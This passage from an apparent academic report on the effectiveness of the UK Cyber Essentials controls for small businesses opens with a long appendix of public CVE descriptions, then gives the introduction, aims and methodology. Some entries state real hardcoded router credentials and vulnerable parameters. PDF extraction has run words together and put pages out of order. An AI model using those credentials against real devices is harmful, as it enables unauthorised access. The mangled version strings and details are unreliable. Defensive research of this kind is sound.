CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
IntroductionC
yber Essentials was introduced asa government funded scheme firstpublished in April 2014 as an interest
of national security to bolster UK securityin cyberspace The Cyber Essentialsscheme was developed in collaboration withthe Information Assurance for Small andMedium Enterprises (IASME) consortiumthe Information Security Forum (ISF) andthe British Standards Institution (BSI) as aset of basic technical security controls fororganisations to utilize for the mitigation ofthe lsquobottom 80rsquo of remote cyber-threats[3]
The scheme built to provide animplementable of the 10-steps to Cyber-Security[1] was released as part of the2011 UK Cyber Security Strategy[16] andis being backed by the UK government asan organisational standard Thus far it hasbeen adopted by several large organisationsincluding Vodafone Hewlett-Packard (HP)BAE Systems Virgin Media and Barclays[5]
The Cyber Essentials accreditation hasbeen made mandatory from October 1st
2014 for all suppliers of government contractsinvolving ldquothe handling of sensitive andpersonal information and provision of certaintechnical products and servicesrdquo[17]
The Cyber Essentials security controls aresummarised as follows[7]
Firewalls and GatewaysThese are devices designed to preventunauthorised access to or from privatenetworks but good setup of thesedevices either in hardware or softwareform is important for them to be fullyeffective
Secure configurationEnsuring that systems are configured inthe most secure way for the needs ofthe organisation
Access controlEnsuring only those who should haveaccess to systems to have access and atthe appropriate level
Malware protectionEnsuring that virus and malwareprotection is installed and is it up todate
Patch managementEnsuring the latest supported version ofapplications is used and all the necessarypatches supplied by the vendor beenapplied
Figure 2 Cyber Essentials Security Tools
The intended scope of Cyber Essentialsis outlined in the Cyber Essentials SchemeAssurance Framework[10] This states thatthe CE controls are considered as applicableto all sizes of Enterprise as a base level ofprotection against cyber-attacks upon whichindividual organisations may build on withfurther tools network devices or protocols forthe mitigation of targeted attacks The CEScheme is clear in its inclusion of lsquoBring your
own Devicersquo network setups to scope as wellas Cloud-based services and off-the-shelf webapplications Bespoke IT systems such as inmanufacturing and retail are applicable to CEbut hold additional vulnerabilities due to theirnature that are not to be considered
Aims
The purpose of this report is to investigatethe effectiveness of the Cyber Essentialscontrols in mitigating lsquocommodity-levelrsquoattacks attempting to exploit vulnerabilitiesin Small and Medium Enterprise (SME)networks
A commodity-level attack has been definedby CESG[8] as
Any unauthenticated remote attackexploiting a known vulnerability withthe use of tools and techniques openlyavailable for download or purchaseon the internet - and that do notrequire extensive specialist knowledge toconduct1
To effectively assess Cyber Essentials itis firstly necessary to understand the typicalnetwork configurations of SMEs Interviewswith SMEs were carried out to build abstractednetwork models and a survey has beenconducted to build a broader picture of SMEnetwork deployments The survey resultswill help to develop our understanding ofcurrent security practice and cyber-awarenessas well as to build a general-case SME networkwith which to analyse the typicality of SMEsinterviewed
The networks modelled from collected dataare to be considered with and without the useof the Cyber Essentials security controls tocomparatively establish the protection grantedwith the adoption of the CE scheme
1This includes attacks utilising pen-testing software such as Metasploit Kali and the Poison Ivy remote access tool which are capable of scanning network nodes for publiclyknown vulnerabilities in the operating system applications or services in use
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 3 of 28
MethodologyT
he scheme of work for this report has beensplit into the following sections
bull Collection of data through interviews anda survey regarding the implementationand deployment of networks in real-worldSMEs for use in designing paper-modelsto be analysed
bull Composition of a list of suitablevulnerabilities that contains applicablemethods by which remote attackers canexploit commodity-level attacks
bull Assessment of vulnerability mitigation forSME networks with and without the useof the CE Tools
